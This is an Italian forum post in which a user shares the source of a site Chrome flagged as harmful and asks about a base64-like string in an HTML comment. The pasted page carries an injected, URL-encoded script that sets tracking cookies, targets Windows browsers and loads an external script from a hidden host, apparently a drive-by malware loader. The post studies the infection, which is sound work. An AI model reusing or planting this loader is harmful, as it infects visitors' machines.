Chrome mi ha appena avvisato di contenuti dannosi durante la visita a un sito, quindi l'ho visitato.
Il codice sorgente è simile al seguente:
<html>
<head>
<link href="images/DPT2.ico" title="Dynamic PowerTrainer Manager" rel="shortcut icon">
<title>Dynamic PowerTrainer Manager</title>
</head>
<frameset rows="94,*" border="0" frameborder="0" framespacing="0"> <!-- Frameset-Definition -->
<frame src="header.jsp" name="header" frameborder="0" marginwidth="0" marginheight="0" noresize>
<frame src="login.jsp" name="main" frameborder="0" marginwidth="0" marginheight="0" noresize>
<noframes>
Your browser doesn't support frames. You can not see this page.
</noframes>
</frameset>
<ad><script type='text/javascript'>document.write(unescape('%3C%73%63%72%69%70%74%3E%76%61%72%20%61%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%70%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%70%22%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%76%61%72%20%62%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%2C%63%3D%22%20%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2C%64%3D%6E%75%6C%6C%2C%65%3D%30%2C%66%3D%30%3B%69%66%28%63%2E%6C%65%6E%67%74%68%3E%30%29%7B%65%3D%63%2E%69%6E%64%65%78%4F%66%28%22%20%68%6F%70%3D%22%29%3B%69%66%28%65%21%3D%2D%31%29%7B%65%2B%3D%35%3B%66%3D%63%2E%69%6E%64%65%78%4F%66%28%22%3B%22%2C%65%29%3B%69%66%28%66%3D%3D%2D%31%29%66%3D%63%2E%6C%65%6E%67%74%68%3B%64%3D%75%6E%65%73%63%61%70%65%28%63%2E%73%75%62%73%74%72%69%6E%67%28%65%2C%66%29%29%7D%7D%20%69%66%28%64%3D%3D%22%68%6F%70%22%26%26%62%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%26%26%61%2E%69%6E%64%65%78%4F%66%28%22%68%69%70%22%29%3D%3D%2D%31%29%7B%76%61%72%20%67%3D%5B%22%6B%65%67%22%2C%22%6B%65%69%22%2C%22%6B%65%6E%22%2C%22%6B%65%70%22%2C%22%6B%65%76%22%2C%22%6B%65%78%22%2C%22%6B%65%79%22%2C%22%6B%68%69%22%2C%22%6B%69%64%22%2C%22%6B%69%66%22%5D%2C%68%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%67%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%38%45%37%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%69%70%3D%22%2B%65%73%63%61%70%65%28%22%68%69%70%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%67%5B%68%5D%2B%27%2E%5C%78%37%34%5C%78%36%31%5C%78%36%62%5C%78%37%34%5C%78%36%39%5C%78%36%62%5C%78%37%35%5C%78%32%65%5C%78%36%32%5C%78%36%39%5C%78%37%61%2F%68%65%6C%70%2F%64%61%74%61%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ad>
<b1><!--8m3vp_oyeNrTzy8o0S/Jz01OLNEvT01KLCgo1k8pKMlNzEtMTy3Sz8lPz8yLTytKzE3VyyousLW1NTQ0NTY0NjQzMgcAmuYUjw==--></b1></body></html>
Sono a conoscenza della stringa offuscata: alcuni elementi javascript, la riproduzione di cookie e il caricamento di uno script esterno da taktiku.biz
Ma qual è il significato della stringa 8m3vp_oyeNrTzy8o0S/Jz01OLNEvT01KLCgo1k8pKMlNzEtMTy3Sz8lPz8yLTytKzE3VyyousLW1NTQ0NTY0NjQzMgcAmuYUjw==
?
Oppure: ci sono dei motivi comuni per posizionare una tale stringa sulle pagine iniettate?